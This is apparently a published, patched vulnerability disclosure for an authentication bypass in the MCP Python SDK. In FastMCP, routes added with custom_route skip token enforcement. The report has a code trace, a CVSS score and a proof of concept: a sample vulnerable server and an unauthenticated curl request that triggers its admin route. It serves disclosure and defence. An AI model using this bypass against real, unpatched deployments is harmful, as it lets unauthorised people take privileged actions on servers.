winfunc
Back to Hacktivity

Status: Patched

This vulnerability has been verified as resolved and deployed.

Anthropic logo
AnthropicCritical2025

Authentication bypass on FastMCP custom routes

Summary

Broken Access Control in FastMCP custom routes

FastMCP.custom_route() allows developers to mount arbitrary HTTP handlers intended for sensitive use cases such as OAuth callbacks or admin APIs, but it never applies RequireAuthMiddleware even when the server is configured with a token verifier. Only the built-in SSE and StreamableHTTP endpoints are wrapped; custom routes are appended to the Starlette app as-is while Starlette’s AuthenticationMiddleware merely records credentials without rejecting unauthenticated requests. As a result any HTTP endpoint registered through @server.custom_route() remains publicly accessible despite OAuth or token-based authentication being enabled for the server. Attackers can directly invoke privileged administration handlers over the network without presenting credentials.

CVSS Score

VectorN
ComplexityL
PrivilegesN
User InteractionN
ScopeU
ConfidentialityH
IntegrityH
AvailabilityL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Vulnerability Location

SourceLine 685
src/mcp/server/fastmcp/server.py
FastMCP.custom_route
SinkLine 920
src/mcp/server/fastmcp/server.py
FastMCP.sse_app

Sink-to-Source Analysis

1
src/mcp/server/fastmcp/server.py:921

Custom Starlette routes registered via custom_route() are appended to the SSE app without additional middleware.

PYTHON
routes.extend(self._custom_starlette_routes)
2
src/mcp/server/fastmcp/server.py:716

custom_route() stores the developer handler as-is with no authentication enforcement even though docstring suggests admin usage.

PYTHON
self._custom_starlette_routes.append(Route(path, endpoint=func,...))
3
src/mcp/server/fastmcp/server.py:953

Even when auth is enabled only AuthenticationMiddleware is added globally; it does not reject unauthenticated requests, so custom routes remain open.

PYTHON
if self._token_verifier:
    middleware = [Middleware(AuthenticationMiddleware, backend=BearerAuthBackend(...)), Middleware(AuthContextMiddleware)]
4
examples/servers/simple-auth/mcp_simple_auth/legacy_as_server.py:84

Attacker-controlled HTTP request reaches privileged handler without proving identity, enabling arbitrary admin operations.

PYTHON
request = await func(request)

Impact Analysis

Critical Impact

Whatever privileged operations the route performs (e.g., issuing OAuth tokens, modifying server state) happen with attacker input. Confidentiality, integrity, and availability of the server are compromised.

Attack Surface

Any MCP deployment that calls FastMCP(..., token_verifier=..., auth=AuthSettings(...)) and registers routes via @server.custom_route().

Preconditions

None; attacker only needs network access. Authentication is enabled but not enforced on custom routes.

Proof of Concept

Environment Setup

Requirements: Ubuntu 22.04+, Python 3.10+, uv package manager.

Install dependencies:

BASH
git clone https://github.com/modelcontextprotocol/python-sdk.git
cd python-sdk
uv sync --frozen

Target Configuration

Create a minimal FastMCP server that enables OAuth-style auth but exposes an admin route:

PYTHON
from mcp.server.fastmcp import FastMCP
from mcp.server.auth.settings import AuthSettings
from mcp.server.auth.provider import AccessToken, TokenVerifier
from starlette.requests import Request
from starlette.responses import JSONResponse

class StaticVerifier(TokenVerifier):
    async def verify_token(self, token: str):
        return AccessToken(token=token, client_id="admin", scopes=["admin"]) if token == "valid" else None

app = FastMCP(
    token_verifier=StaticVerifier(),
    auth=AuthSettings(
        issuer_url="https://auth.example.com",
        resource_server_url="https://server.example.com",
        required_scopes=["admin"],
    ),
)

@app.custom_route("/admin/restart", methods=["POST"])
async def restart(_: Request):
    return JSONResponse({"status": "restarted"})

if __name__ == "__main__":
    app.run(transport="streamable-http")

Run the vulnerable server:

BASH
uv run python vulnerable_server.py
# Server listens on http://127.0.0.1:8000/mcp

Exploit Delivery

Unauthenticated attack:

BASH
curl -X POST http://127.0.0.1:8000/admin/restart

Outcome

An Internet attacker can trigger any custom admin route without valid tokens (resetting state, altering configuration, dumping data, etc.), fully bypassing the configured OAuth/token protections.

Expected Response:

JSON
{"status":"restarted"}

No Authorization header is required even though the server advertises admin scope enforcement.

View Patch PRVerify fix on GitHub